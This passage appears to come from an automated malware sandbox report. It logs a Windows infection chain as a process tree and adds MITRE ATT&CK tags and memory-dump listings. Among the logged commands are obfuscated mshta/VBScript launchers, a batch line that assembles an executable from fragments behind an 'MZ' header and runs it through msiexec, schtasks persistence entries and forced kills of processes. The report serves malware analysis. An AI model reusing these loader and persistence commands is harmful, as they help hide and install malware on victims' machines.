        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:5920
      - C:\Users\Admin\AppData\Roaming\3612270.exe
        
        "C:\Users\Admin\AppData\Roaming\3612270.exe"
        6⤵
        
        PID:5492
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri0470d89df3bb718.exe
      4⤵
      PID:3044
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0470d89df3bb718.exe
        
        Fri0470d89df3bb718.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1252
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:860
        
        C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
        7⤵
        
        PID:4912
        
        C:\Users\Admin\AppData\Roaming\298966.exe
        
        "C:\Users\Admin\AppData\Roaming\298966.exe"
        8⤵
        
        PID:6128
        
        C:\Users\Admin\AppData\Roaming\8858186.exe
        
        "C:\Users\Admin\AppData\Roaming\8858186.exe"
        8⤵
        
        PID:3728
        
        C:\Users\Admin\AppData\Roaming\280046.exe
        
        "C:\Users\Admin\AppData\Roaming\280046.exe"
        8⤵
        
        PID:4028
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\280046.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\280046.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        9⤵
        
        PID:5208
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\280046.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\280046.exe" ) do taskkill -f -Im "%~NXZ"
        10⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -Im "280046.exe"
        11⤵
        Kills process with taskkill
        
        PID:5932
        
        C:\Users\Admin\AppData\Roaming\4103620.exe
        
        "C:\Users\Admin\AppData\Roaming\4103620.exe"
        8⤵
        
        PID:2712
        
        C:\Users\Admin\AppData\Roaming\5544882.exe
        
        "C:\Users\Admin\AppData\Roaming\5544882.exe"
        8⤵
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
        7⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4.exe"
        7⤵
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        8⤵
        
        PID:3284
        
        C:\Users\Admin\AppData\Local\Temp\5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5.exe"
        7⤵
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
        
        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
        7⤵
        
        PID:1908
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        10⤵
        
        PID:5976
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        11⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        12⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        11⤵
        
        PID:6268
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        12⤵
        
        PID:6496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        13⤵
        
        PID:7024
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        13⤵
        
        PID:7056
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y ..\lXQ2g.WC
        13⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "search_hyperfs_206.exe"
        10⤵
        Kills process with taskkill
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:652
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 796
        8⤵
        Program crash
        
        PID:4088
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 812
        8⤵
        Program crash
        
        PID:1248
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 816
        8⤵
        Program crash
        
        PID:1960
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 812
        8⤵
        Program crash
        
        PID:6384
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 924
        8⤵
        Program crash
        
        PID:7128
        
        C:\Users\Admin\AppData\Local\Temp\jgliu-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jgliu-game.exe"
        7⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        
        PID:4020
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        8⤵
        
        PID:5520
        
        C:\Users\Admin\AppData\Local\Temp\6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        7⤵
        
        PID:2612
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2612 -s 1532
        8⤵
        Program crash
        
        PID:4648
        
        C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        7⤵
        
        PID:4652
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        8⤵
        
        PID:5488
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri043a70f76ef98.exe
      4⤵
      PID:3804
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri043a70f76ef98.exe
        
        Fri043a70f76ef98.exe
        5⤵
        Executes dropped EXE
        
        PID:2292
      - C:\Users\Admin\Pictures\Adobe Films\TFYhs_eqPwU0Vyg5K4PnbJ3N.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\TFYhs_eqPwU0Vyg5K4PnbJ3N.exe"
        6⤵
        
        PID:3276
      - C:\Users\Admin\Pictures\Adobe Films\k1bNRY0Ug0bEut6am87mxzsr.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\k1bNRY0Ug0bEut6am87mxzsr.exe"
        6⤵
        
        PID:6196
        
        C:\Users\Admin\Pictures\Adobe Films\k1bNRY0Ug0bEut6am87mxzsr.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\k1bNRY0Ug0bEut6am87mxzsr.exe"
        7⤵
        
        PID:4924
      - C:\Users\Admin\Pictures\Adobe Films\GNBWkSbWcRIp8eO0Oefhnt94.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\GNBWkSbWcRIp8eO0Oefhnt94.exe"
        6⤵
        
        PID:6220
      - C:\Users\Admin\Pictures\Adobe Films\Fbb5XA4V4nEklMg3I2qaroMW.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Fbb5XA4V4nEklMg3I2qaroMW.exe"
        6⤵
        
        PID:6188
      - C:\Users\Admin\Pictures\Adobe Films\_rO2CnBl_GlEQPOUTArtATnK.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\_rO2CnBl_GlEQPOUTArtATnK.exe"
        6⤵
        
        PID:6180
      - C:\Users\Admin\Pictures\Adobe Films\VGmsgxVSwpgtPAwIomJkbS6S.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\VGmsgxVSwpgtPAwIomJkbS6S.exe"
        6⤵
        
        PID:6172
      - C:\Users\Admin\Pictures\Adobe Films\7zaq6AzVPwuzsEdy6oPJ8zES.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7zaq6AzVPwuzsEdy6oPJ8zES.exe"
        6⤵
        
        PID:6164
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:7020
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:7016
        
        C:\Users\Admin\Documents\kCO1nDQYMqbEr2OyMJ62B_6E.exe
        
        "C:\Users\Admin\Documents\kCO1nDQYMqbEr2OyMJ62B_6E.exe"
        7⤵
        
        PID:608
        
        C:\Users\Admin\Pictures\Adobe Films\nbq0cCkruoEkCsV3OAo2VAWg.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\nbq0cCkruoEkCsV3OAo2VAWg.exe"
        8⤵
        
        PID:5008
        
        C:\Users\Admin\Pictures\Adobe Films\vniXhE2awQ4W2HcK6l9UuREm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\vniXhE2awQ4W2HcK6l9UuREm.exe"
        8⤵
        
        PID:1260
        
        C:\Users\Admin\Pictures\Adobe Films\ZXle4GWcnDifU5EEr_afGarJ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ZXle4GWcnDifU5EEr_afGarJ.exe"
        8⤵
        
        PID:6284
        
        C:\Users\Admin\Pictures\Adobe Films\gxFd2cLlu8jpe92iqbGjyZ3T.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\gxFd2cLlu8jpe92iqbGjyZ3T.exe"
        8⤵
        
        PID:4056
        
        C:\Users\Admin\Pictures\Adobe Films\i2kzJ33yJxG3Xuh6Hs1Ju6wz.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\i2kzJ33yJxG3Xuh6Hs1Ju6wz.exe"
        8⤵
        
        PID:5344
        
        C:\Users\Admin\Pictures\Adobe Films\k6Q3WsZNyCwb5pODfruHScZD.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\k6Q3WsZNyCwb5pODfruHScZD.exe"
        8⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\k6Q3WsZNyCwb5pODfruHScZD.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\k6Q3WsZNyCwb5pODfruHScZD.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        9⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\k6Q3WsZNyCwb5pODfruHScZD.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\k6Q3WsZNyCwb5pODfruHScZD.exe" ) do taskkill -f -iM "%~NxM"
        10⤵
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        11⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        12⤵
        
        PID:6992
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        13⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "k6Q3WsZNyCwb5pODfruHScZD.exe"
        11⤵
        Kills process with taskkill
        
        PID:2176
        
        C:\Users\Admin\Pictures\Adobe Films\b4thJrjd8zM97AD7mAi9cEqw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\b4thJrjd8zM97AD7mAi9cEqw.exe"
        8⤵
        
        PID:6328
        
        C:\Users\Admin\Pictures\Adobe Films\b4thJrjd8zM97AD7mAi9cEqw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\b4thJrjd8zM97AD7mAi9cEqw.exe" -u
        9⤵
        
        PID:3600
        
        C:\Users\Admin\Pictures\Adobe Films\jJv2hDSZkyevvniVV9SxQH5R.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\jJv2hDSZkyevvniVV9SxQH5R.exe"
        8⤵
        
        PID:6160
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        9⤵
        
        PID:4028
        
        C:\Users\Admin\Pictures\Adobe Films\JV_qGjnY9vyokAB0r5fiu6Vq.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\JV_qGjnY9vyokAB0r5fiu6Vq.exe"
        8⤵
        
        PID:6788
        
        C:\Users\Admin\AppData\Local\Temp\is-C05IO.tmp\JV_qGjnY9vyokAB0r5fiu6Vq.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-C05IO.tmp\JV_qGjnY9vyokAB0r5fiu6Vq.tmp" /SL5="$20368,506127,422400,C:\Users\Admin\Pictures\Adobe Films\JV_qGjnY9vyokAB0r5fiu6Vq.exe"
        9⤵
        
        PID:68
        
        C:\Users\Admin\AppData\Local\Temp\is-3RVGU.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-3RVGU.tmp\DYbALA.exe" /S /UID=2709
        10⤵
        
        PID:1320
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri0480a54c0d2a7.exe
      4⤵
      PID:2664
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0480a54c0d2a7.exe
        
        Fri0480a54c0d2a7.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3164
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:4680
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:6372
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri042d82e64f594.exe
      4⤵
      PID:2184
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri042d82e64f594.exe
        
        Fri042d82e64f594.exe
        5⤵
        Executes dropped EXE
        
        PID:4952
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri0471ced4d802994.exe
      4⤵
      PID:1748
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0471ced4d802994.exe
        
        Fri0471ced4d802994.exe
        5⤵
        Executes dropped EXE
        
        PID:4128
      - C:\Users\Admin\AppData\Local\Temp\is-HFIJV.tmp\Fri0471ced4d802994.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HFIJV.tmp\Fri0471ced4d802994.tmp" /SL5="$4005C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0471ced4d802994.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0471ced4d802994.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0471ced4d802994.exe" /SILENT
        7⤵
        Executes dropped EXE
        
        PID:1648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri04113f869350dcf8.exe
      4⤵
      PID:1196
    - - C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04113f869350dcf8.exe
        
        Fri04113f869350dcf8.exe
        5⤵
        Executes dropped EXE
        
        PID:4136
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04113f869350dcf8.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04113f869350dcf8.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )
        6⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04113f869350dcf8.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "" == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri04113f869350dcf8.exe" ) do taskkill /Im "%~Nxs" -f
        7⤵
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE
        
        ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k
        8⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF ""-pVmK5OY1Q2FwiV3_NJROp~tX8k "" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )
        9⤵
        
        PID:928
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "-pVmK5OY1Q2FwiV3_NJROp~tX8k " == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ) do taskkill /Im "%~Nxs" -f
        10⤵
        
        PID:4552
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBsCrIpt: closE ( crEateOBjECT ("WsCRipT.sHELl" ).ruN( "cmD.Exe /r EchO | SEt /P = ""MZ"" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB + V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q * " ,0 , TRUE ) )
        9⤵
        
        PID:3100
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r EchO | SEt /P = "MZ" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB+ V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q *
        10⤵
        
        PID:4524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EchO "
        11⤵
        
        PID:680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>OoZ39QP7.Q~P"
        11⤵
        
        PID:4572
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe -y ..\WgKZNZ9T.JOX
        11⤵
        
        PID:6328
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /Im "Fri04113f869350dcf8.exe" -f
        8⤵
        Kills process with taskkill
        
        PID:4540
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3280 -s 520
      4⤵
      Program crash
      Suspicious use of AdjustPrivilegeToken
      PID:4836

C:\Users\Admin\AppData\Local\Temp\is-41B9E.tmp\Fri0471ced4d802994.tmp
"C:\Users\Admin\AppData\Local\Temp\is-41B9E.tmp\Fri0471ced4d802994.tmp" /SL5="$400CA,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS831FB566\Fri0471ced4d802994.exe" /SILENT
1⤵
PID:3480

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4492
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:5612

C:\Windows\SysWOW64\msdt.exe
"C:\Windows\SysWOW64\msdt.exe"
1⤵
PID:6752
- C:\Windows\SysWOW64\cmd.exe
  /c del "C:\Users\Admin\Pictures\Adobe Films\_rO2CnBl_GlEQPOUTArtATnK.exe"
  2⤵
  PID:7072

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6584
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:6940

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-658-0x000002E46FF60000-0x000002E46FFD2000-memory.dmp

Filesize
456KB

Download
memory/652-622-0x0000000000400000-0x0000000002F0E000-memory.dmp

Filesize
43.1MB

Download
memory/652-590-0x0000000002F10000-0x000000000305A000-memory.dmp

Filesize
1.3MB

Download
memory/652-587-0x00000000001D0000-0x00000000001F7000-memory.dmp

Filesize
156KB

Download
memory/860-287-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

Filesize
4KB

Download
memory/944-358-0x0000000000400000-0x000000000058E000-memory.dmp

Filesize
1.6MB

Download
memory/944-356-0x0000000000590000-0x00000000006DA000-memory.dmp

Filesize
1.3MB

Download
memory/1212-250-0x0000000006E50000-0x0000000006E51000-memory.dmp

Filesize
4KB

Download
memory/1212-308-0x0000000006C80000-0x0000000006C81000-memory.dmp

Filesize
4KB

Download
memory/1212-281-0x0000000007560000-0x0000000007561000-memory.dmp

Filesize
4KB

Download
memory/1212-236-0x00000000006C0000-0x00000000006C1000-memory.dmp

Filesize
4KB

Download
memory/1212-279-0x00000000074F0000-0x00000000074F1000-memory.dmp

Filesize
4KB

Download
memory/1212-278-0x0000000006D80000-0x0000000006D81000-memory.dmp

Filesize
4KB

Download
memory/1212-271-0x0000000006C00000-0x0000000006C01000-memory.dmp

Filesize
4KB

Download
memory/1212-445-0x000000007F510000-0x000000007F511000-memory.dmp

Filesize
4KB

Download
memory/1212-478-0x0000000006813000-0x0000000006814000-memory.dmp

Filesize
4KB

Download
memory/1212-244-0x0000000000CF0000-0x0000000000CF1000-memory.dmp

Filesize
4KB

Download
memory/1212-258-0x0000000006810000-0x0000000006811000-memory.dmp

Filesize
4KB

Download
memory/1212-240-0x00000000006C0000-0x00000000006C1000-memory.dmp

Filesize
4KB

Download
memory/1212-263-0x0000000006812000-0x0000000006813000-memory.dmp

Filesize
4KB

Download
memory/1252-226-0x000000001B090000-0x000000001B092000-memory.dmp

Filesize
8KB

Download
memory/1252-220-0x0000000000480000-0x0000000000481000-memory.dmp

Filesize
4KB

Download
memory/1388-262-0x0000000004A60000-0x0000000004A61000-memory.dmp

